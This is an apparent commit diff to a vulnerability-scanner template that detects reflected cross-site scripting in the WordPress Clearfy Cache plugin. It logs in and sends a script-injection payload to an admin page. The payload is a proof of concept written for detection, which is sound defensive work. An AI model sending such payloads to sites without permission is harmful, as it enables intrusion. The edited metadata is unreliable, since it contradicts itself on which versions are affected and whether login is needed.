vulnerabilities/wordpress/clearfy-cache-xss.yaml (before)
id: clearfy-cache-xss

info:
  name: Clearfy Cache < 2.0.5 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
    - https://wordpress.org/plugins/clearfy
  tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=gonzales-wbcr_clearfy&action=index&wbcr_assets_manager=1&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(1)</script>'
          - "Webcraftic Clearfy - WordPress optimization plugin"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/wordpress/clearfy-cache-xss.yaml (after)
id: clearfy-cache-xss

info:
  name: WordPress Clearfy Cache <2.0.5 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress Clearfy Cache 2.0.5 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
    - https://wordpress.org/plugins/clearfy
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=gonzales-wbcr_clearfy&action=index&wbcr_assets_manager=1&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(1)</script>'
          - "Webcraftic Clearfy - WordPress optimization plugin"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/clearfy-cache-xss.yaml (diff)
@@ -1,13 +1,17 @@
 id: clearfy-cache-xss
 
 info:
-  name: Clearfy Cache < 2.0.5 - Reflected Cross-Site Scripting
+  name: WordPress Clearfy Cache <2.0.5 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress Clearfy Cache 2.0.5 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
     - https://wordpress.org/plugins/clearfy
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
